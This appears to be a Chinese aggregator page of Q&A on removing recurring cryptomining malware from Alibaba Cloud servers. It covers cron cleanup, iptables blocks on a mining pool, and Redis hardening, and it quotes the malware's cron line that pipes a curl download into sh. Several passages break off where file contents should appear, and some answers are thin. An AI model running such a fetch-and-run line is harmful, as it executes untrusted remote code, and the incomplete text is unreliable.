本文给大家谈谈阿里云挖矿程序删了又出现,以及阿里云挖矿程序什么意思对应的知识点,希望对各位有所帮助,不要忘了收藏本站喔。
本文目录:
- 1、云服务器中挖矿病毒的清除过程(二)
- 2、阿里云提示服务器c:\windows\temp\hostdll.exe存在挖坑木马,删除后没过多久就自动下载了 请问怎么根除
- 3、btd挖矿已经实名了,不小心APP删了,怎么能再安装上?
- 4、阿里云服务器被挖矿了怎么办?(纯纯电脑小白
- 5、阿里云windows服务器中了挖矿的病毒怎么清理?
云服务器中挖矿病毒的清除过程(二)
发现一台服务器,CPU使用率一直50%左右,top查看一进程名称为
-bash,按c查看详情,名称显示为python
十分可疑
杀掉进程,清空crontab内容,并删除此目录文件,发现过一阵进程又被启动起来了
查看/etc/cron.hourly,发现有一个sync文件,还是会定时执行,内容为
此文件还被加了保护权限,需要用chattr去除后删除
cron.daily cron.weekly cron.monthly里面也有
同样方法删除/bin/sysdrr
至此病毒被彻底清除
删除/opt/.new目录时,发现此目录下还有一个/opt/.md目录,内容如下
病毒运行原理是
其他常用的诊断命令
关联文章:
云服务器中挖矿病毒的清除过程
服务器中毒导致的wget等系统命令失效后的恢复
参考文章:
【PC样本分析】记录最近与挖矿病毒的斗智斗勇
【PC样本分析】记录最近与挖矿病毒的斗智斗勇(二)
阿里云提示服务器c:\windows\temp\hostdll.exe存在挖坑木马,删除后没过多久就自动下载了 请问怎么根除
杀毒软件直接杀毒不就得了么
安装个电脑管家到电脑上
然后使用病毒查杀,对着你的电脑杀毒就行了
btd挖矿已经实名了,不小心APP删了,怎么能再安装上?
我记得不错的话,你先重启下,看看有没有,还有进app
把他装成功再装
阿里云服务器被挖矿了怎么办?(纯纯电脑小白
1. 关闭访问挖矿服务器的访问
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3. pkill minerd ,杀掉进程
4. service stop crond 或者 crontab -r 删除所有的执行计划
5. 执行top,查看了一会,没有再发现minerd 进程了。
6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
*/5 * * * * curl -fsSL | sh
病毒文件内容如下,感兴趣的可以研究下:
? View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,然后就注入了病毒,下面是解决办法和清除工作:
1. 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号
3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.
阿里云windows服务器中了挖矿的病毒怎么清理?
光删除没用的,因为没有解决好漏洞。
建议是重做系统,然后找护卫神给你做一下系统安全加固,把漏洞彻底堵住才有效果。
本文关于阿里云挖矿程序删了又出现和阿里云挖矿程序什么意思的内容来源于网络,版权归原作者所有,如有侵权,请联系删除!
【美国高防三网直连、香港便宜VPS云服务器购买请访问:www.98cloud.com】
